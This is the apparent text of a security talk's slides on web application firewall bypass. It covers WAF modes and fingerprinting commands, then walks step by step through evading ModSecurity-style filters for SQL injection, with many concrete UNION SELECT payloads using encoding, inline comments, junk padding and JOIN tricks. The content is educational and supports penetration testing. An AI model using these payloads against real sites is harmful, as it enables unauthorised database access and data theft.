WAF BypassingTechniques

Avinash Kumar Thapa, Senior Security Analyst in Network Intelligence India

Bug Hunter on Hackerone CTF Author on Vulnhub.com Some exploits and PoC on Exploit-db as well. Passionate about Web Applications Security and Exploit Writing.

Agenda Introduction to Web Applications Firewalls Operation Modes Vendors Fingerprinting WAF Ways to Bypass WAFs Practical Cases for Bypassing Conclusion

Introduction to Web Application Firewalls

Presents as Application Layer Monitors all HTTP/HTTPs/SOAP/XML-RPC Web services traffic between client and servers

based upon their pre-defined signatures in a database. Basic goal of WAF is to monitor and block the contents that violates pre-defined policy. These pre-defined policies are patterns of user input which ends up in potential attack. Understands HTTP and HTTPs traffic better than any traditional firewall.

Types of Operation Modes

Negative ModeA negative security model recognize attacks by relying on a database of expected attack signatures.Example:Do not allow in any page, any argument value (user input) which match potential XSS strings like <script>,</script>, String.fromCharCode, etc.

Pros:● Less time to implement.

Cons:● Less protection.

Positive Model A positive security model enforces positive behaviour by learning the application logic and the

building a security policy of valid known requests as a user interacts with the application.Example: Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until

65535. Using intval conditions on page. (Accepts only integers)Pros:● Better performance (less rules).● Less false positives.Cons:● Much more time to implement.● Some vendors provide “automatic learning mode”, they help, but are far from perfect,in the end, you always need a skilled human to review the policies

Mix Model

Combination of both positive and negative model.

Testing Environments Google Chrome Mozilla Firefox Internet Explorer Opera Browser

Products F5 BIG IP WAF Sucuri Modsecurity Imperva Incapsula PHP-IDS (PHP Intrusion Detection System) Quick Defense AQTRONIX WebKnight (For IIS and based on ISAPI filters) Barracuda WAF

Fingerprinting WAFAdds Cookie to the HTTP Communication. For Citrix Netscaler WAF

Fingerprinting WAF F5 BIG IP ASM

Fingerprinting WAF On the basis of HTTP Response

Other WAF’s may be detected by the type of http response we receive when submitting a malicious request, responses may vary depending upon a WAF to a WAF. Some of the common responses are 403, 406, 419, 500, 501 etc.

Fingerprinting WAF Response for BIG F5

Fingerprinting WAF Request and Response for ModSecurity Firewall

Request:

Fingerprinting WAF Request and Response for ModSecurity Firewall

Response:

Fingerprinting WAF Response for WebKnight Firewall

Response:

Fingerprinting WAF Response for WebKnight Firewall

Response rendered on Browser

Automatic Fingerprinting WAF Using Nmap Scripts

nmap -p80 --script http-waf-detect <host>

Using WaFw00f.py

Python Wafw00f.py –url <URL>

Techniques to Bypass WAFs

Bypassing WAF For SQL Injection Vulnerabilities Bypassing WAF for XSS Issues Bypassing WAF for LFI and RFI vulnerabilities.

General Techniques to bypass WAF Null Character Injection Mixed Case Inline Comments Chunked Requests Buffer Overflow HTTP Parameter Pollution URL encoding Keyword Splitting

Replaced Keywords Ignoring Cookies Using Data URIs Header Injection

Bypassing WAF For SQL Injection Vulnerabilities

https://abc.com/index.php?id=1

Example 1 (Without WAF)

‘

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6

Example 1 (With WAF)

https://abc.com/index.php?id=1‘HTTP/1.1 403 Forbidden ErrorOrHTTP/1.1 406 Not AcceptableorHTTP/1.1 404 Not FoundOrHTTP/1.1 500 Internal Server ErrorOrHTTP/1.1 400 Bad Request

Some recon on WAF

Came to know Modsecurity is in action

https://abc.com/index.php?id=1

“HTTP/1.1 200 OK

https://abc.com/index.php?id=1

%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1’ ' at line 6

This technique is URL Encoding

Some time you need to use:1) Double URL Encoding :- %2527%27’2) Triple URL Encoding:- %252525%2527%27’ (This is very rare Case)

https://abc.com/index.php?id=1

%27 ORDER BY 1%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘Order’ keyword is Blocked ??• ‘Order by ’ keyword is Blocked ??• Any other alternative of Order by query ??• Does Spaces are blocked

Let’s Try

https://abc.com/index.php?id=1

%27 ORDER %23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘Order’ keyword is Blocked• Check again ‘order’ is blocked ??

https://abc.com/index.php?id=1

%27ORDER%23HTTP/1.1 200 OK

New Assumptions in mind• ‘Order’ keyword is not Blocked• What is blocked then ???

SPACES ARE BLOCKED

https://abc.com/index.php?id=1

%27 ORDER by 1 %23

HTTP/1.1 403 Forbidden

https://abc.com/index.php?id=1

%27ORDERby1 %23

HTTP/1.1 200 OK

No Assumptions in mind

Because spaces are blocked only

Techniques to bypass spacesUsing ‘+’ instead of space like:- order+by+1 (Mostly blocked)Using inline comments instead of spaces ‘/**/’ like:- order/**/by/**/1Using combination of inline comments and URL encoding instead of spaces like:

• Order/%2a%2a/by/%2a%2a/1• Order%2f**%2fby%2f**%2f1

Using combination of inline comments, URL encoding & Junk Characters instead of spaces like:

• Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1• Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1

Techniques to bypass spaces

Using white space characters %0a, %0b, %0c, %0d,%a0,%09,%01

Query will be ORDER%0aby%0a1 ORDER%0bby%0b1 ORDER%0cby%0c1 ORDER%0Dby%0D1 ORDER%A0by%A01 ORDER%0D%0Aby%0D%0A1

https://abc.com/index.php?id=1

%27/**/ORDER/**/by/**/1%23

HTTP/1.1 200 OK

Let’s Suppose no. of columns are 3

https://abc.com/index.php?id=1

%27 UNION SELECT 1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘Spaces’ are Blocked ??

https://abc.com/index.php?id=1

%27/**/UNION/**/SELECT/**/1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘Spaces’ were bypassed using inline

comments..…Still blocked???• ‘UNION’ keyword is blocked ??• ‘SELECT’ keyword is blocked ??• ‘Intergers’ are blocked ??• ‘Commas’ are blocked ?• Combination of “UNION SELECT” is blocked• “SELECT with Integers” are blocked

Techniques to Bypass

Using Inline comments: /!*50000UNION*/ /*!40000UNION*/ /*!00000UNION*/

If UNION is blocked

Using URL Encoding Techniques: %53nion %2553nion %55%4e%49%4f%4e (UNION)

Double URL Encoding

Triple URL Encoding

https://abc.com/index.php?id=1

%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23

https://abc.com/index.php?id=1

%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23https://abc.com/index.php?id=1

%27/**//*!%55NION*//**/SELECT/**/1,2,3%23

https://abc.com/index.php?id=1

%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23

HTTP/1.1 403 Forbidden Assumptions in mind• ‘UNION’ keyword is blocked ??• ‘SELECT’ keyword is blocked ??• ‘Intergers’ are blocked ??• ‘Commas’ are blocked ?• Combination of “UNION SELECT” is blocked• “SELECT with Integers” are blocked

https://abc.com/index.php?id=1

%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23

https://abc.com/index.php?id=1

%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23https://abc.com/index.php?

id=1%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23

https://abc.com/index.php?id=1

%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘UNION’ keyword is blocked ??• ‘SELECT’ keyword is blocked ??• ‘Intergers’ are blocked ??• ‘Commas’ are blocked ?• Combination of “UNION SELECT” is blocked• “SELECT with Integers” are blocked

https://abc.com/index.php?id=1

%27/**//*!50000UNION*/1,2,3%23

HTTP/1.1 200 OK

https://abc.com/index.php?id=1

%27/**//*!50000SELECT*/1,2,3%23

HTTP/1.1 200 OK

Assumptions in mind• ‘UNION’ keyword is NOT blocked.• ‘SELECT’ keyword is NOT blocked.• ‘Intergers’ are NOT blocked • ‘Commas’ are NOT blocked • Combination of “UNION SELECT” is blocked ?• “SELECT with Integers” are NOT blocked

Techniques to bypass combination of “union select”Using combination of inline comments and URL encoding :• /*!50000%55niOn*/ /*!50000%53eLECT*/

Using white spaces and URL encoding of comments (#)

• Union%23%0aSELECT• Union%23%0bSELECT• Union%23%0cSELECT• Union%23%0DSELECT• Union%23%A0SELECT

Using combination of inline comments and URL encoding :• /*!50000%55niOn*/ /*!50000%53eLECT*/

Techniques to bypass combination of “union select”

Using Buffer Overflow

UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECTSome time need to increase the junk as per the requirement

UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT

Techniques to bypass combination of “union select”Using Distinct statement

UNION DISTINCT SELECT

Using Distinctrow statement

UNION DISTINCTROW SELECT

https://abc.com/index.php?id=1%27/**/UNION

%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0ASELECT/**/1,2,3%23

HTTP/1.1 200 OK

Special Case : What if Commas got blocked ?

https://abc.com/index.php?id=1

%27/**/UNION/**/SELECT/**/1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind• ‘UNION’ keyword is NOT blocked.• ‘SELECT’ keyword is NOT blocked.• ‘Intergers’ are NOT blocked • ‘Commas’ are blocked • Combination of “UNION SELECT” is NOT

blocked ?• “SELECT with Integers” are NOT blocked

Time to bypass commas “,”.

Basic Bypasses URL Encoding - %2c , Double URL Encoding - %252c %2c , Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2

Basic Bypasses URL Encoding - %2c , Double URL Encoding - %252c %2c , Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2

Advance way to bypass “Commas” Using JOIN

JOIN used for columns as UNION is used for the rows

We have SELECT 1,2,3

SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

Advance way to bypass “Commas” https://abc.com/index.php?id=1

%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b%23

HTTP/1.1 200 OK

Similar Approach for other Vulnerabilities For XSS For LFI / RFI

DEMO TIME

References Images in slides 10,11,14,15,16,17 Taken from

http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf

Thank you..!